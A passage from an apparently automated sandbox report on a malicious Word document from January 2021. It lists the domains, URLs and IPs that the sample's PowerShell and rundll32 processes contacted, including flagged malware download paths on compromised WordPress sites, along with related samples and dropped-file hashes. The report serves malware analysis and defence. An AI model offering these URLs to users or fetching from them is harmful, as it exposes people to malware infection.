                        		truetrue
                          		unknown
                          sofsuite.com
                          		104.27.145.251
                          		truetrue
                            		unknown
                            khanhhoahomnay.net
                            		210.86.239.69
                            		truetrue
                              		unknown
                              shop.elemenslide.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://veterinariadrpopui.com/content/5f18Q/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://sofsuite.com/wp-includes/2jm3nIk/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://khanhhoahomnay.net/wordpress/CGMC/true
                                • Avira URL Cloud: malware
                                		unknown
                                http://5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://wpsapk.com/wp-admin/v/true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpfalse
                                  		high
                                  http://veterinariadrpopui.compowershell.exe, 00000005.00000002.2113375099.0000000003A6E000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://investor.msn.comrundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpfalse
                                      		high
                                      http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpfalse
                                        		high
                                        https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000005.00000002.2113375099.0000000003A6E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2113102392.0000000003A07000.00000004.00000001.sdmpfalse
                                          		high
                                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2114950190.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108832801.00000000023E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109391718.0000000001FE7000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2105665763.0000000002420000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110083444.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2111681625.00000000027C0000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2104363576.0000000000294000.00000004.00000020.sdmpfalse
                                                		high
                                                http://shop.elemenslide.compowershell.exe, 00000005.00000002.2113549064.0000000003AA9000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://khanhhoahomnay.netpowershell.exe, 00000005.00000002.2113549064.0000000003AA9000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://shop.elemenslide.com/wp-content/n/powershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://investor.msn.com/rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://sofsuite.compowershell.exe, 00000005.00000002.2113132741.0000000003A23000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://wpsapk.compowershell.exe, 00000005.00000002.2111561067.00000000036D3000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2104348720.0000000000264000.00000004.00000020.sdmpfalse
                                                    		high
                                                    http://www.%s.comPApowershell.exe, 00000005.00000002.2105665763.0000000002420000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110083444.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2111681625.00000000027C0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		low

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.27.145.251
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    210.86.239.69
                                                    		unknownViet Nam
                                                    		24173NETNAM-AS-APNetnamCompanyVNtrue
                                                    209.59.139.39
                                                    		unknownUnited States
                                                    		32244LIQUIDWEBUStrue
                                                    104.18.61.59
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    5.2.136.90
                                                    		unknownRomania
                                                    		8708RCS-RDS73-75DrStaicoviciROtrue

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                    Analysis ID:336489
                                                    Start date:06.01.2021
                                                    Start time:08:35:59
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 20s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:pack-91089 416755919.doc
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:16
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • GSI enabled (VBA)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winDOC@24/8@7/5
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 75.7% (good quality ratio 72.5%)
                                                    • Quality average: 75.2%
                                                    • Quality standard deviation: 25.7%
                                                    HCA Information:
                                                    • Successful, ratio: 91%
                                                    • Number of executed functions: 134
                                                    • Number of non-executed functions: 90
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .doc
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Found warning dialog
                                                    • Click Ok
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    08:36:41API Interceptor1x Sleep call for process: msg.exe modified
                                                    08:36:42API Interceptor64x Sleep call for process: powershell.exe modified
                                                    08:36:49API Interceptor896x Sleep call for process: rundll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    104.27.145.2514560 2021 UE_9893.docGet hashmaliciousBrowse
                                                    • sofsuite.com/wp-includes/2jm3nIk/
                                                    Documento-2021.docGet hashmaliciousBrowse
                                                    • sofsuite.com/wp-includes/2jm3nIk/
                                                    209.59.139.39Adjunto.docGet hashmaliciousBrowse
                                                    • veterinariadrpopui.com/content/5f18Q/
                                                    NQN0244_012021.docGet hashmaliciousBrowse
                                                    • veterinariadrpopui.com/content/5f18Q/
                                                    4560 2021 UE_9893.docGet hashmaliciousBrowse
                                                    • veterinariadrpopui.com/content/5f18Q/
                                                    Scan-0767672.docGet hashmaliciousBrowse
                                                    • veterinariadrpopui.com/content/5f18Q/
                                                    Documento-2021.docGet hashmaliciousBrowse
                                                    • veterinariadrpopui.com/content/5f18Q/
                                                    info_39534.docGet hashmaliciousBrowse
                                                    • veterinariadrpopui.com/content/5f18Q/
                                                    http://btxtfnereq4mf3x3q1eq1sdudvhhiurr.www4.meGet hashmaliciousBrowse
                                                    • cirugiaesteticamexico.medicainspira.com/wordpress/wp-content/upgrade/i/googlephotos/album/
                                                    104.18.61.594560 2021 UE_9893.docGet hashmaliciousBrowse
                                                    • wpsapk.com/wp-admin/v/
                                                    5.2.136.90Adjunto.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
                                                    arc-NZY886292.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
                                                    NQN0244_012021.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
                                                    4560 2021 UE_9893.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
                                                    Scan-0767672.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
                                                    Documento-2021.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
                                                    informazioni-0501-012021.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/kcdo20u2bqptv6/
                                                    rapport 40329241.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
                                                    info_39534.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/5ciqo/dhqbj3xw/
                                                    Dati_012021_688_89301.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
                                                    2199212_20210105_160680.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
                                                    ARCHIVO_FILE.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/ji02pdi/39rfb96opn/
                                                    doc_X_13536.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
                                                    REP380501 040121.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
                                                    doc-20210104-0184.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/
                                                    7823099012021.docGet hashmaliciousBrowse
                                                    • 5.2.136.90/bl7bvpp8itof0dvu5j2/nwcw9ztkp/yjrulniti57vcwwk67t/6u49kr6/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    wpsapk.comAdjunto.docGet hashmaliciousBrowse
                                                    • 104.18.60.59
                                                    NQN0244_012021.docGet hashmaliciousBrowse
                                                    • 104.18.60.59
                                                    4560 2021 UE_9893.docGet hashmaliciousBrowse
                                                    • 104.18.61.59
                                                    Scan-0767672.docGet hashmaliciousBrowse
                                                    • 104.18.60.59
                                                    Documento-2021.docGet hashmaliciousBrowse
                                                    • 172.67.141.14
                                                    info_39534.docGet hashmaliciousBrowse
                                                    • 172.67.141.14
                                                    veterinariadrpopui.comAdjunto.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    NQN0244_012021.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    4560 2021 UE_9893.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    Scan-0767672.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    Documento-2021.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    info_39534.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    sofsuite.comAdjunto.docGet hashmaliciousBrowse
                                                    • 104.27.144.251
                                                    NQN0244_012021.docGet hashmaliciousBrowse
                                                    • 104.27.144.251
                                                    4560 2021 UE_9893.docGet hashmaliciousBrowse
                                                    • 104.27.145.251
                                                    Scan-0767672.docGet hashmaliciousBrowse
                                                    • 104.27.144.251
                                                    Documento-2021.docGet hashmaliciousBrowse
                                                    • 104.27.145.251
                                                    info_39534.docGet hashmaliciousBrowse
                                                    • 172.67.158.72

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    LIQUIDWEBUShttps://securemail.bridgepointeffect.com/Get hashmaliciousBrowse
                                                    • 69.167.167.26
                                                    Adjunto.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    NQN0244_012021.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    4560 2021 UE_9893.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    Scan-0767672.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    Documento-2021.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    info_39534.docGet hashmaliciousBrowse
                                                    • 209.59.139.39
                                                    https://encrypt.idnmazate.org/Get hashmaliciousBrowse
                                                    • 67.225.177.41
                                                    Nuevo pedido.exeGet hashmaliciousBrowse
                                                    • 209.188.81.142
                                                    https://6354mortgagestammp.com/Get hashmaliciousBrowse
                                                    • 69.16.199.206
                                                    rib.exeGet hashmaliciousBrowse
                                                    • 72.52.175.20
                                                    https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsecuremail.danchihosassociates.com&c=E,1,HOuENPlSucTdSUxKwjhrlo_5dPC7J6R1N-Gq03z50mu0n-SbGg9k6UcvRdnb2hWVC0JKp04hBPt2pBkJTi_IhWBa5JSs0U_QUfg3Hl_nTWTxJyTIR8N3&typo=1Get hashmaliciousBrowse
                                                    • 67.225.158.30
                                                    messaggio 2912.docGet hashmaliciousBrowse
                                                    • 67.227.152.97
                                                    8415051-122020.docGet hashmaliciousBrowse
                                                    • 67.227.152.97
                                                    Mensaje 900-777687.docGet hashmaliciousBrowse
                                                    • 67.227.152.97
                                                    088-29-122020-522-0590.docGet hashmaliciousBrowse
                                                    • 67.227.152.97
                                                    MENSAJE KCW_9805910.docGet hashmaliciousBrowse
                                                    • 67.227.152.97
                                                    https://image-grafix.com/0098/099/Get hashmaliciousBrowse
                                                    • 72.52.133.164
                                                    Info-29.docGet hashmaliciousBrowse
                                                    • 67.227.152.97
                                                    naamloos-40727_8209243962.docGet hashmaliciousBrowse
                                                    • 67.227.152.97
                                                    CLOUDFLARENETUSPayment Documents.xlsGet hashmaliciousBrowse
                                                    • 104.22.1.232
                                                    Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                                    • 104.22.1.232
                                                    QPI-01458.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    LITmNphcCA.exeGet hashmaliciousBrowse
                                                    • 104.28.5.151
                                                    http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                                    • 172.67.179.45
                                                    http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                                    • 104.16.203.237
                                                    http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                                    • 172.64.170.19
                                                    https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                    • 104.18.70.113
                                                    https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                                                    • 104.16.115.104
                                                    HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                                    • 172.67.156.125
                                                    http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                    • 104.18.225.52
                                                    https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                    • 104.18.70.113
                                                    http://p1.pagewiz.net/w5c8j120/Get hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    Og8qU1smzy.exeGet hashmaliciousBrowse
                                                    • 162.159.138.232
                                                    https://nimb.ws/10IXxlGet hashmaliciousBrowse
                                                    • 104.26.3.186
                                                    https://www.canva.com/design/DAESYWKuLHs/avvDNRvDuj_tk82H9Q45ZQ/view?utm_content=DAESYWKuLHs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                    • 104.17.115.17
                                                    CLOUDFLARENETUSPayment Documents.xlsGet hashmaliciousBrowse
                                                    • 104.22.1.232
                                                    Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                                    • 104.22.1.232
                                                    QPI-01458.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    LITmNphcCA.exeGet hashmaliciousBrowse
                                                    • 104.28.5.151
                                                    http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                                    • 172.67.179.45
                                                    http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                                    • 104.16.203.237
                                                    http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                                    • 172.64.170.19
                                                    https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                    • 104.18.70.113
                                                    https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                                                    • 104.16.115.104
                                                    HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                                    • 172.67.156.125
                                                    http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                    • 104.18.225.52
                                                    https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                    • 104.18.70.113
                                                    http://p1.pagewiz.net/w5c8j120/Get hashmaliciousBrowse
                                                    • 104.16.19.94
                                                    Og8qU1smzy.exeGet hashmaliciousBrowse
                                                    • 162.159.138.232
                                                    https://nimb.ws/10IXxlGet hashmaliciousBrowse
                                                    • 104.26.3.186
                                                    https://www.canva.com/design/DAESYWKuLHs/avvDNRvDuj_tk82H9Q45ZQ/view?utm_content=DAESYWKuLHs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                    • 104.17.115.17

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43B9F0D0-FFD8-4816-B513-C2DC6937B540}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):46
                                                    Entropy (8bit):1.0424600748477153
                                                    Encrypted:false
                                                    SSDEEP:3:/lbWwWl:sZ
                                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                    Malicious:false
                                                    Preview: ........................................user.
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):98
                                                    Entropy (8bit):4.451793808565335
                                                    Encrypted:false
                                                    SSDEEP:3:M1uAdcF2xU4oNvPdcF2xU4omX1uAdcF2xU4ov:MsAeojGXeojGAeojy
                                                    MD5:0343436CC573DA8C3B743021EF37BE96
                                                    SHA1:4ECCC69D6286C0A8BE51EC1DEE36B672BAD1D14E
                                                    SHA-256:E6AB1C312E3066F4335F23CEAB9B3991DB18A556A8D94B417BEB791E50FC4E59
                                                    SHA-512:0031D277C85F4E8CE3ED1B0EED12B7BCD640E0A492A73E8F8284919A45ECF68FF1B767052F95DEC343C5FACB8A53B2C3EF4CE056AFDA3D819B352585C4742605
                                                    Malicious:false
                                                    Preview: [doc]..pack-91089 416755919.LNK=0..pack-91089 416755919.LNK=0..[doc]..pack-91089 416755919.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\pack-91089 416755919.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:36:38 2021, length=171008, window=hide
                                                    Category:dropped
                                                    Size (bytes):2128
                                                    Entropy (8bit):4.526634059162851
                                                    Encrypted:false
                                                    SSDEEP:48:82/XT0jFc21mRKWIQh22/XT0jFc21mRKWIQ/:82/XojFc/RKWIQh22/XojFc/RKWIQ/
                                                    MD5:5D56E856A72C045F620942E0590EAF3E
                                                    SHA1:8E96722B93AAD4C3DBCB6C504CFB6B2CA12116CA
                                                    SHA-256:25C6CD1EC2BDD497B7D5815D8A4EC0001EEB18816A7ACEFAFF6D7FA3D240E629
                                                    SHA-512:9C0B7BC0E25E81701451224803B6C1B4A0757CCFC5AC2B78EAC1748B5129C31D25C130155B9CC6C4416B72DC0CB42BAFFFF65F609A897A39947426AF95584E1C
                                                    Malicious:false
                                                    Preview: L..................F.... .......{......{..*...J................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.....&R.. .PACK-9~1.DOC..^.......Q.y.Q.y*...8.....................p.a.c.k.-.9.1.0.8.9. .4.1.6.7.5.5.9.1.9...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\pack-91089 416755919.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.a.c.k.-.9.1.0.8.9. .4.1.6.7.5.5.9.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.431160061181642
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                    MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                    SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                    SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                    SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V7BBYL9UXF0HWT367KEW.temp
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):8016
                                                    Entropy (8bit):3.5890538041827384
                                                    Encrypted:false
                                                    SSDEEP:96:chQCsMqftMqvsqvJCwoSz8hQCsMqftMqvsEHyqvJCworozv1YftJHNf8Ovt+lUVi:cy3oSz8y7Hnorozv6f8OgIu
                                                    MD5:38002FEB116E9220F81A8FDFC7F3D088
                                                    SHA1:27CFCA945B71BDCCCC3CB8490F6E38DEFB15F1CB
                                                    SHA-256:4C4E7918011A4489174B7BF2B65524296B089CD53C49835A4AD9092878B80FB6
                                                    SHA-512:F811E3EB2335C76E7A17292765BE61E0DDC87B53A48B23F71917C4777E4F3C9C120AB6D1D8C6D6075847E6C0D757C4A6939DFE431F673CF64452361BB3BAB6F1
                                                    Malicious:false
